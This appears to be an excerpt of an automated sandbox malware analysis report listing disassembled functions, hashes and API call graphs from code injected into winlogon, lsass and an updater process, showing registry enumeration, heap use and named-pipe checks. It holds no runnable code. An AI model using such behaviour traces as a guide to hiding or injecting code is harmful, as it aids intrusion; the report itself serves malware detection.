                                                              • Snapshot File: hcaresult_30_2_225dc610000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: __std_exception_copy
                                                              • String ID: ierarchy Descriptor'$riptor at (
                                                              • API String ID: 592178966-758928094
                                                              • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                              • Instruction ID: 40d697394cd767119a46280874914b4daa5d8e9346db535fcc515f98333aa0ca
                                                              • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                              • Instruction Fuzzy Hash: 7EE08661A41F84A0DF118F66E8442D873A0DB58B69B48D122995C46311FA38D1E9C300
                                                              Function 00000225DC677356 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3071140080.00000225DC670000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc670000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: __std_exception_copy
                                                              • String ID: ierarchy Descriptor'$riptor at (
                                                              • API String ID: 592178966-758928094
                                                              • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                              • Instruction ID: 3bdf3a98a46eddaab18917913d4673d13906e839a3b4fd0dcf7fe39589f613a6
                                                              • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                              • Instruction Fuzzy Hash: B2E08661640F84A0EF018F65E8442D833A0DB5CB65B49D122995C06351FA38D1E9C301
                                                              Function 00000225DC6173B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3070618302.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc610000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: __std_exception_copy
                                                              • String ID: Locator'$riptor at (
                                                              • API String ID: 592178966-4215709766
                                                              • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                              • Instruction ID: 33387b3a89b0f7cf97b4c9f63ea1e6ce0b438a2dcf969175634c70bf0c094b31
                                                              • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                              • Instruction Fuzzy Hash: F9E0CD61A01F44D0DF118F65D4441D87360E75CB69F88D222CD4C47311FB38D1E5C300
                                                              Function 00000225DC6773B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3071140080.00000225DC670000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc670000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: __std_exception_copy
                                                              • String ID: Locator'$riptor at (
                                                              • API String ID: 592178966-4215709766
                                                              • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                              • Instruction ID: 5795fbfa8a47514ff8c6ddda118d1662a7868f1be9d24305db9b02968eedc405
                                                              • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                              • Instruction Fuzzy Hash: 28E08661640F8490EF018F65D4401987360EB5CB55B88D122C95C06351FA38D1E5C301
                                                              Function 00000225DC641BF4 Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3070825749.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc640000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: Heap$Process$AllocFree
                                                              • String ID:
                                                              • API String ID: 756756679-0
                                                              • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                              • Instruction ID: 435233d5cd765dd7833698f1ddb9f59ae8d1156237805913c2fcddc5f4e0a6b6
                                                              • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                              • Instruction Fuzzy Hash: B2119129615F5492EB54DFAEA80C26973A1FB89FC2F188065DE4E53765DF38C442C300
                                                              Function 00000225DC6A1BF4 Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3071355596.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc6a0000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: Heap$Process$AllocFree
                                                              • String ID:
                                                              • API String ID: 756756679-0
                                                              • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                              • Instruction ID: 1420031e885aaf21fcc6fdccc82258bc3790c71e1673b6532d453dab14891ff2
                                                              • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                              • Instruction Fuzzy Hash: 95115129601F64E2EA54DFAEA44C22977A5FB89FC2F188025DE4E97765DF38C442C300
                                                              Function 00000225DC641268 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3070825749.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc640000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: Heap$AllocProcess
                                                              • String ID:
                                                              • API String ID: 1617791916-0
                                                              • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                              • Instruction ID: 46137aeb2ac080d4014b8e101a3abee4704eba82c5d2520b876412a79b8151bf
                                                              • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                              • Instruction Fuzzy Hash: 77E06D39621E1486EB548FEAD80C36A36E1FB89F06F14C024CA0907751DF7DC499C750
                                                              Function 00000225DC6A1268 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3071355596.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc6a0000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: Heap$AllocProcess
                                                              • String ID:
                                                              • API String ID: 1617791916-0
                                                              • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                              • Instruction ID: 5f6bbecbb8621be69b39046fe70b37093b4047639506c31062e86b7116282652
                                                              • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                              • Instruction Fuzzy Hash: 3EE03239A01E1486EB088BAAD80834A36E2EB89B07F08C0248A0907361DF7DC499CB90

                                                              Executed Functions

                                                              Function 00007FF671C91140 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000023.00000002.1765916876.00007FF671C91000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF671C90000, based on PE: true
                                                              • Associated: 00000023.00000002.1765834841.00007FF671C90000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000023.00000002.1766016367.00007FF671CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000023.00000002.1766124143.00007FF671CA8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000023.00000002.1767172052.00007FF671F27000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000023.00000002.1768091820.00007FF67219D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000023.00000002.1768174212.00007FF6721D6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000023.00000002.1768213648.00007FF6721D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_35_2_7ff671c90000_updater.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 468899d511a3580b8016a16ee82124799021391b29db4fe74c236ec62e562d6c
                                                              • Instruction ID: 0e17ceffaecce42c6e047c961318c96bc8801b57e19ee03381d9752b300a025b
                                                              • Opcode Fuzzy Hash: 468899d511a3580b8016a16ee82124799021391b29db4fe74c236ec62e562d6c
                                                              • Instruction Fuzzy Hash: A7B01272D2430988E3012FC1E84235832706B08781F600032C60C473A2CF7D50404B10

                                                              Execution Graph

                                                              Execution Coverage:1.2%
                                                              Dynamic/Decrypted Code Coverage:0%
                                                              Signature Coverage:0%
                                                              Total number of Nodes:269
                                                              Total number of Limit Nodes:18
                                                              execution_graph 14840 202c0ab273c 14841 202c0ab276a 14840->14841 14842 202c0ab2858 LoadLibraryA 14841->14842 14843 202c0ab28d4 14841->14843 14842->14841 14844 202c0ae202c 14845 202c0ae205d 14844->14845 14846 202c0ae2081 14845->14846 14847 202c0ae2173 14845->14847 14857 202c0ae213e 14845->14857 14852 202c0ae20b9 StrCmpNIW 14846->14852 14855 202c0ae20e0 14846->14855 14846->14857 14848 202c0ae2178 14847->14848 14849 202c0ae21e7 14847->14849 14865 202c0ae2f04 GetProcessHeap HeapAlloc 14848->14865 14851 202c0ae21ec 14849->14851 14849->14857 14853 202c0ae2f04 11 API calls 14851->14853 14852->14846 14854 202c0ae2190 14853->14854 14854->14857 14855->14846 14858 202c0ae1bf4 14855->14858 14859 202c0ae1c8f 14858->14859 14860 202c0ae1c1b GetProcessHeap HeapAlloc 14858->14860 14859->14855 14860->14859 14861 202c0ae1c56 14860->14861 14862 202c0ae1c77 GetProcessHeap HeapFree 14861->14862 14871 202c0ae152c 14861->14871 14862->14859 14869 202c0ae2f57 14865->14869 14866 202c0ae3015 GetProcessHeap HeapFree 14866->14854 14867 202c0ae3010 14867->14866 14868 202c0ae2fa2 StrCmpNIW 14868->14869 14869->14866 14869->14867 14869->14868 14870 202c0ae1bf4 6 API calls 14869->14870 14870->14869 14872 202c0ae157c 14871->14872 14875 202c0ae1546 14871->14875 14872->14862 14873 202c0ae155d StrCmpIW 14873->14875 14874 202c0ae1565 StrCmpW 14874->14875 14875->14872 14875->14873 14875->14874 14876 202c0ae1abc 14881 202c0ae1628 GetProcessHeap HeapAlloc 14876->14881 14878 202c0ae1ad2 Sleep SleepEx 14879 202c0ae1acb 14878->14879 14879->14878 14880 202c0ae1598 StrCmpIW StrCmpW 14879->14880 14880->14879 14932 202c0ae1268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14881->14932 14883 202c0ae1650 14933 202c0ae1000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14883->14933 14885 202c0ae1658 14934 202c0ae1268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14885->14934 14887 202c0ae1661 14935 202c0ae1268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14887->14935 14889 202c0ae166a 14936 202c0ae1268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14889->14936 14891 202c0ae1673 14937 202c0ae1000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14891->14937 14893 202c0ae167c 14938 202c0ae1000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14893->14938 14895 202c0ae1685 14939 202c0ae1000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14895->14939 14897 202c0ae168e RegOpenKeyExW 14898 202c0ae16c0 RegOpenKeyExW 14897->14898 14899 202c0ae18a6 14897->14899 14900 202c0ae16ff RegOpenKeyExW 14898->14900 14901 202c0ae16e9 14898->14901 14899->14879 14902 202c0ae173a RegOpenKeyExW 14900->14902 14903 202c0ae1723 14900->14903 14946 202c0ae12bc RegQueryInfoKeyW 14901->14946 14907 202c0ae175e 14902->14907 14908 202c0ae1775 RegOpenKeyExW 14902->14908 14940 202c0ae104c RegQueryInfoKeyW 14903->14940 14910 202c0ae12bc 16 API calls 14907->14910 14911 202c0ae17b0 RegOpenKeyExW 14908->14911 14912 202c0ae1799 14908->14912 14913 202c0ae176b RegCloseKey 14910->14913 14915 202c0ae17eb RegOpenKeyExW 14911->14915 14916 202c0ae17d4 14911->14916 14914 202c0ae12bc 16 API calls 14912->14914 14913->14908 14919 202c0ae17a6 RegCloseKey 14914->14919 14917 202c0ae180f 14915->14917 14918 202c0ae1826 RegOpenKeyExW 14915->14918 14920 202c0ae12bc 16 API calls 14916->14920 14922 202c0ae104c 6 API calls 14917->14922 14923 202c0ae1861 RegOpenKeyExW 14918->14923 14924 202c0ae184a 14918->14924 14919->14911 14921 202c0ae17e1 RegCloseKey 14920->14921 14921->14915 14925 202c0ae181c RegCloseKey 14922->14925 14927 202c0ae189c RegCloseKey 14923->14927 14928 202c0ae1885 14923->14928 14926 202c0ae104c 6 API calls 14924->14926 14925->14918 14929 202c0ae1857 RegCloseKey 14926->14929 14927->14899 14930 202c0ae104c 6 API calls 14928->14930 14929->14923 14931 202c0ae1892 RegCloseKey 14930->14931 14931->14927 14932->14883 14933->14885 14934->14887 14935->14889 14936->14891 14937->14893 14938->14895 14939->14897 14941 202c0ae10bf 14940->14941 14942 202c0ae11b5 RegCloseKey 14940->14942 14941->14942 14943 202c0ae10cf RegEnumValueW 14941->14943 14942->14902 14944 202c0ae1125 14943->14944 14944->14942 14944->14943 14945 202c0ae114e GetProcessHeap HeapAlloc GetProcessHeap HeapFree 14944->14945 14945->14944 14947 202c0ae148a RegCloseKey 14946->14947 14948 202c0ae1327 GetProcessHeap HeapAlloc 14946->14948 14947->14900 14949 202c0ae1476 GetProcessHeap HeapFree 14948->14949 14950 202c0ae1352 RegEnumValueW 14948->14950 14949->14947 14951 202c0ae13a5 14950->14951 14951->14949 14951->14950 14952 202c0ae152c 2 API calls 14951->14952 14953 202c0ae141e lstrlenW GetProcessHeap HeapAlloc StrCpyW 14951->14953 14954 202c0ae13d3 GetProcessHeap HeapAlloc GetProcessHeap HeapFree 14951->14954 14952->14951 14953->14951 14954->14953 14955 202c0ae253c 14957 202c0ae25bb 14955->14957 14956 202c0ae27aa 14957->14956 14958 202c0ae261d GetFileType 14957->14958 14959 202c0ae2641 14958->14959 14960 202c0ae262b StrCpyW 14958->14960 14971 202c0ae1a40 GetFinalPathNameByHandleW 14959->14971 14961 202c0ae2650 14960->14961 14965 202c0ae265a 14961->14965 14969 202c0ae26ff 14961->14969 14964 202c0ae3844 StrCmpNIW 14964->14969 14965->14956 14976 202c0ae3844 14965->14976 14979 202c0ae3044 StrCmpIW 14965->14979 14983 202c0ae1cac 14965->14983 14968 202c0ae3044 4 API calls 14968->14969 14969->14956 14969->14964 14969->14968 14970 202c0ae1cac 2 API calls 14969->14970 14970->14969 14972 202c0ae1a6a StrCmpNIW 14971->14972 14973 202c0ae1aa9 14971->14973 14972->14973 14974 202c0ae1a84 lstrlenW 14972->14974 14973->14961 14974->14973 14975 202c0ae1a96 StrCpyW 14974->14975 14975->14973 14977 202c0ae3851 StrCmpNIW 14976->14977 14978 202c0ae3866 14976->14978 14977->14978 14978->14965 14980 202c0ae308d PathCombineW 14979->14980 14981 202c0ae3076 StrCpyW StrCatW 14979->14981 14982 202c0ae3096 14980->14982 14981->14982 14982->14965 14984 202c0ae1ccc 14983->14984 14985 202c0ae1cc3 14983->14985 14984->14965 14986 202c0ae152c 2 API calls 14985->14986 14986->14984 14987 202c0aed6cc 14992 202c0aed6dd __free_lconv_mon 14987->14992 14988 202c0aed72e 14993 202c0aed6ac 14988->14993 14989 202c0aed712 HeapAlloc 14990 202c0aed72c 14989->14990 14989->14992 14992->14988 14992->14989 14996 202c0aecfa0 14993->14996 14995 202c0aed6b5 14995->14990 14998 202c0aecfb5 __vcrt_InitializeCriticalSectionEx 14996->14998 14997 202c0aecfe1 FlsSetValue 14999 202c0aecff3 14997->14999 15002 202c0aecfd1 _invalid_parameter_noinfo 14997->15002 14998->14997 14998->15002 15012 202c0aed6cc 14999->15012 15002->14995 15003 202c0aed020 FlsSetValue 15005 202c0aed03e 15003->15005 15006 202c0aed02c FlsSetValue 15003->15006 15004 202c0aed010 FlsSetValue 15007 202c0aed019 15004->15007 15023 202c0aecb94 15005->15023 15006->15007 15018 202c0aed744 15007->15018 15011 202c0aed744 __free_lconv_mon 2 API calls 15011->15002 15017 202c0aed6dd __free_lconv_mon 15012->15017 15013 202c0aed72e 15016 202c0aed6ac __free_lconv_mon 5 API calls 15013->15016 15014 202c0aed712 HeapAlloc 15015 202c0aed002 15014->15015 15014->15017 15015->15003 15015->15004 15016->15015 15017->15013 15017->15014 15019 202c0aed749 HeapFree 15018->15019 15020 202c0aed77a 15018->15020 15019->15020 15021 202c0aed764 __free_lconv_mon __vcrt_InitializeCriticalSectionEx 15019->15021 15020->15002 15022 202c0aed6ac __free_lconv_mon 5 API calls 15021->15022 15022->15020 15024 202c0aecc46 __free_lconv_mon 15023->15024 15027 202c0aecaec 15024->15027 15026 202c0aecc5b 15026->15011 15028 202c0aecb08 15027->15028 15031 202c0aecd7c 15028->15031 15030 202c0aecb1e 15030->15026 15032 202c0aecdc4 Concurrency::details::SchedulerProxy::DeleteThis 15031->15032 15033 202c0aecd98 Concurrency::details::SchedulerProxy::DeleteThis 15031->15033 15032->15030 15033->15032 15035 202c0af07b4 15033->15035 15036 202c0af0850 15035->15036 15039 202c0af07d7 15035->15039 15037 202c0af08a3 15036->15037 15040 202c0aed744 __free_lconv_mon 6 API calls 15036->15040 15101 202c0af0954 15037->15101 15039->15036 15041 202c0af0816 15039->15041 15046 202c0aed744 __free_lconv_mon 6 API calls 15039->15046 15042 202c0af0874 15040->15042 15043 202c0af0838 15041->15043 15049 202c0aed744 __free_lconv_mon 6 API calls 15041->15049 15044 202c0aed744 __free_lconv_mon 6 API calls 15042->15044 15045 202c0aed744 __free_lconv_mon 6 API calls 15043->15045 15047 202c0af0888 15044->15047 15051 202c0af0844 15045->15051 15052 202c0af080a 15046->15052 15048 202c0aed744 __free_lconv_mon 6 API calls 15047->15048 15053 202c0af0897 15048->15053 15054 202c0af082c 15049->15054 15050 202c0af090e 15055 202c0aed744 __free_lconv_mon 6 API calls 15051->15055 15061 202c0af2fc8 15052->15061 15058 202c0aed744 __free_lconv_mon 6 API calls 15053->15058 15089 202c0af30d4 15054->15089 15055->15036 15056 202c0aed744 6 API calls __free_lconv_mon 15060 202c0af08af 15056->15060 15058->15037 15060->15050 15060->15056 15062 202c0af2fd1 15061->15062 15087 202c0af30cc 15061->15087 15063 202c0af2feb 15062->15063 15064 202c0aed744 __free_lconv_mon 6 API calls 15062->15064 15065 202c0af2ffd 15063->15065 15066 202c0aed744 __free_lconv_mon 6 API calls 15063->15066 15064->15063 15067 202c0af300f 15065->15067 15068 202c0aed744 __free_lconv_mon 6 API calls 15065->15068 15066->15065 15069 202c0af3021 15067->15069 15070 202c0aed744 __free_lconv_mon 6 API calls 15067->15070 15068->15067 15071 202c0af3033 15069->15071 15072 202c0aed744 __free_lconv_mon 6 API calls 15069->15072 15070->15069 15073 202c0af3045 15071->15073 15074 202c0aed744 __free_lconv_mon 6 API calls 15071->15074 15072->15071 15075 202c0af3057 15073->15075 15076 202c0aed744 __free_lconv_mon 6 API calls 15073->15076 15074->15073 15077 202c0af3069 15075->15077 15078 202c0aed744 __free_lconv_mon 6 API calls 15075->15078 15076->15075 15079 202c0af307b 15077->15079 15080 202c0aed744 __free_lconv_mon 6 API calls 15077->15080 15078->15077 15081 202c0af308d 15079->15081 15082 202c0aed744 __free_lconv_mon 6 API calls 15079->15082 15080->15079 15083 202c0af30a2 15081->15083 15085 202c0aed744 __free_lconv_mon 6 API calls 15081->15085 15082->15081 15084 202c0af30b7 15083->15084 15086 202c0aed744 __free_lconv_mon 6 API calls 15083->15086 15084->15087 15088 202c0aed744 __free_lconv_mon 6 API calls 15084->15088 15085->15083 15086->15084 15087->15041 15088->15087 15090 202c0af30d9 15089->15090 15099 202c0af313a 15089->15099 15091 202c0af30f2 15090->15091 15092 202c0aed744 __free_lconv_mon 6 API calls 15090->15092 15093 202c0af3104 15091->15093 15094 202c0aed744 __free_lconv_mon 6 API calls 15091->15094 15092->15091 15095 202c0aed744 __free_lconv_mon 6 API calls 15093->15095 15097 202c0af3116 15093->15097 15094->15093 15095->15097 15096 202c0af3128 15096->15099 15100 202c0aed744 __free_lconv_mon 6 API calls 15096->15100 15097->15096 15098 202c0aed744 __free_lconv_mon 6 API calls 15097->15098 15098->15096 15099->15043 15100->15099 15102 202c0af0985 15101->15102 15103 202c0af0959 15101->15103 15102->15060 15103->15102 15107 202c0af3174 15103->15107 15106 202c0aed744 __free_lconv_mon 6 API calls 15106->15102 15108 202c0af317d 15107->15108 15109 202c0af097d 15107->15109 15143 202c0af3140 15108->15143 15109->15106 15112 202c0af3140 Concurrency::details::SchedulerProxy::DeleteThis 6 API calls 15113 202c0af31a6 15112->15113 15114 202c0af3140 Concurrency::details::SchedulerProxy::DeleteThis 6 API calls 15113->15114 15115 202c0af31b4 15114->15115 15116 202c0af3140 Concurrency::details::SchedulerProxy::DeleteThis 6 API calls 15115->15116 15117 202c0af31c2 15116->15117 15118 202c0af3140 Concurrency::details::SchedulerProxy::DeleteThis 6 API calls 15117->15118 15119 202c0af31d1 15118->15119 15120 202c0aed744 __free_lconv_mon 6 API calls 15119->15120 15121 202c0af31dd 15120->15121 15122 202c0aed744 __free_lconv_mon 6 API calls 15121->15122 15123 202c0af31e9 15122->15123 15124 202c0aed744 __free_lconv_mon 6 API calls 15123->15124 15125 202c0af31f5 15124->15125 15126 202c0af3140 Concurrency::details::SchedulerProxy::DeleteThis 6 API calls 15125->15126 15127 202c0af3203 15126->15127 15128 202c0af3140 Concurrency::details::SchedulerProxy::DeleteThis 6 API calls 15127->15128 15129 202c0af3211 15128->15129 15130 202c0af3140 Concurrency::details::SchedulerProxy::DeleteThis 6 API calls 15129->15130 15131 202c0af321f 15130->15131 15132 202c0af3140 Concurrency::details::SchedulerProxy::DeleteThis 6 API calls 15131->15132 15133 202c0af322d 15132->15133 15134 202c0af3140 Concurrency::details::SchedulerProxy::DeleteThis 6 API calls 15133->15134 15135 202c0af323c 15134->15135 15136 202c0aed744 __free_lconv_mon 6 API calls 15135->15136 15137 202c0af3248 15136->15137 15138 202c0aed744 __free_lconv_mon 6 API calls 15137->15138 15139 202c0af3254 15138->15139 15140 202c0aed744 __free_lconv_mon 6 API calls 15139->15140 15141 202c0af3260 15140->15141 15142 202c0aed744 __free_lconv_mon 6 API calls 15141->15142 15142->15109 15144 202c0af3167 15143->15144 15145 202c0af3156 15143->15145 15144->15112 15145->15144 15146 202c0aed744 __free_lconv_mon 6 API calls 15145->15146 15146->15145

                                                              Executed Functions

                                                              Function 00000202C0AE253C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 56 202c0ae253c-202c0ae25c0 call 202c0b02cc0 59 202c0ae27d8-202c0ae27fb 56->59 60 202c0ae25c6-202c0ae25c9 56->60 60->59 61 202c0ae25cf-202c0ae25dd 60->61 61->59 62 202c0ae25e3-202c0ae2629 call 202c0ae8c60 * 3 GetFileType 61->62 69 202c0ae2641-202c0ae264b call 202c0ae1a40 62->69 70 202c0ae262b-202c0ae263f StrCpyW 62->70 71 202c0ae2650-202c0ae2654 69->71 70->71 73 202c0ae26ff-202c0ae2704 71->73 74 202c0ae265a-202c0ae2673 call 202c0ae30a8 call 202c0ae3844 71->74 75 202c0ae2707-202c0ae270c 73->75 87 202c0ae26aa-202c0ae26f4 call 202c0b02cc0 74->87 88 202c0ae2675-202c0ae26a4 call 202c0ae30a8 call 202c0ae3044 call 202c0ae1cac 74->88 77 202c0ae270e-202c0ae2711 75->77 78 202c0ae2729 75->78 77->78 80 202c0ae2713-202c0ae2716 77->80 82 202c0ae272c-202c0ae2745 call 202c0ae30a8 call 202c0ae3844 78->82 80->78 83 202c0ae2718-202c0ae271b 80->83 97 202c0ae2787-202c0ae2789 82->97 98 202c0ae2747-202c0ae2776 call 202c0ae30a8 call 202c0ae3044 call 202c0ae1cac 82->98 83->78 86 202c0ae271d-202c0ae2720 83->86 86->78 91 202c0ae2722-202c0ae2727 86->91 87->59 99 202c0ae26fa 87->99 88->59 88->87 91->78 91->82 102 202c0ae27aa-202c0ae27ad 97->102 103 202c0ae278b-202c0ae27a5 97->103 98->97 120 202c0ae2778-202c0ae2783 98->120 99->74 106 202c0ae27af-202c0ae27b5 102->106 107 202c0ae27b7-202c0ae27ba 102->107 103->75 106->59 110 202c0ae27bc-202c0ae27bf 107->110 111 202c0ae27d5 107->111 110->111 114 202c0ae27c1-202c0ae27c4 110->114 111->59 114->111 115 202c0ae27c6-202c0ae27c9 114->115 115->111 117 202c0ae27cb-202c0ae27ce 115->117 117->111 119 202c0ae27d0-202c0ae27d3 117->119 119->59 119->111 120->59 121 202c0ae2785 120->121 121->75
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.3077497573.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_202c0ae0000_lsass.jbxd
                                                              Similarity
                                                              • API ID: FileType
                                                              • String ID: \\.\pipe\
                                                              • API String ID: 3081899298-91387939
                                                              • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                              • Instruction ID: 383afa285ac380fd55eaa2c4cb7d261a7defb1f4293108ecd3c580df2b121f06
                                                              • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                              • Instruction Fuzzy Hash: 517190362047C1C6F625DF2998CC3AE7794F389B84F560127DFAA53B8ADA35CA598700
                                                              Function 00000202C0AE202C Relevance: 4.7, APIs: 1, Strings: 2, Instructions: 162COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 123 202c0ae202c-202c0ae2057 call 202c0b02d00 125 202c0ae205d-202c0ae2066 123->125 126 202c0ae206f-202c0ae2072 125->126 127 202c0ae2068-202c0ae206c 125->127 128 202c0ae2078-202c0ae207b 126->128 129 202c0ae2223-202c0ae2243 126->129 127->126 130 202c0ae2081-202c0ae2093 128->130 131 202c0ae2173-202c0ae2176 128->131 130->129 134 202c0ae2099-202c0ae20a5 130->134 132 202c0ae2178-202c0ae2192 call 202c0ae2f04 131->132 133 202c0ae21e7-202c0ae21ea 131->133 132->129 143 202c0ae2198-202c0ae21ae 132->143 133->129 138 202c0ae21ec-202c0ae21ff call 202c0ae2f04 133->138 136 202c0ae20a7-202c0ae20b7 134->136 137 202c0ae20d3-202c0ae20de call 202c0ae1bbc 134->137 136->137 140 202c0ae20b9-202c0ae20d1 StrCmpNIW 136->140 144 202c0ae20ff-202c0ae2111 137->144 151 202c0ae20e0-202c0ae20f8 call 202c0ae1bf4 137->151 138->129 150 202c0ae2201-202c0ae2209 138->150 140->137 140->144 143->129 149 202c0ae21b0-202c0ae21cc 143->149 147 202c0ae2121-202c0ae2123 144->147 148 202c0ae2113-202c0ae2115 144->148 154 202c0ae212a 147->154 155 202c0ae2125-202c0ae2128 147->155 152 202c0ae211c-202c0ae211f 148->152 153 202c0ae2117-202c0ae211a 148->153 156 202c0ae21d0-202c0ae21e3 149->156 150->129 157 202c0ae220b-202c0ae2213 150->157 151->144 163 202c0ae20fa-202c0ae20fd 151->163 160 202c0ae212d-202c0ae2130 152->160 153->160 154->160 155->160 156->156 161 202c0ae21e5 156->161 162 202c0ae2216-202c0ae2221 157->162 164 202c0ae213e-202c0ae2141 160->164 165 202c0ae2132-202c0ae2138 160->165 161->129 162->129 162->162 163->160 164->129 166 202c0ae2147-202c0ae214b 164->166 165->134 165->164 167 202c0ae214d-202c0ae2150 166->167 168 202c0ae2162-202c0ae216e 166->168 167->129 169 202c0ae2156-202c0ae215b 167->169 168->129 169->166 170 202c0ae215d 169->170 170->129
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.3077497573.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_202c0ae0000_lsass.jbxd
                                                              Similarity
                                                              • API ID: Heap$Process$AllocFree
                                                              • String ID: S$dialer
                                                              • API String ID: 756756679-3873981283
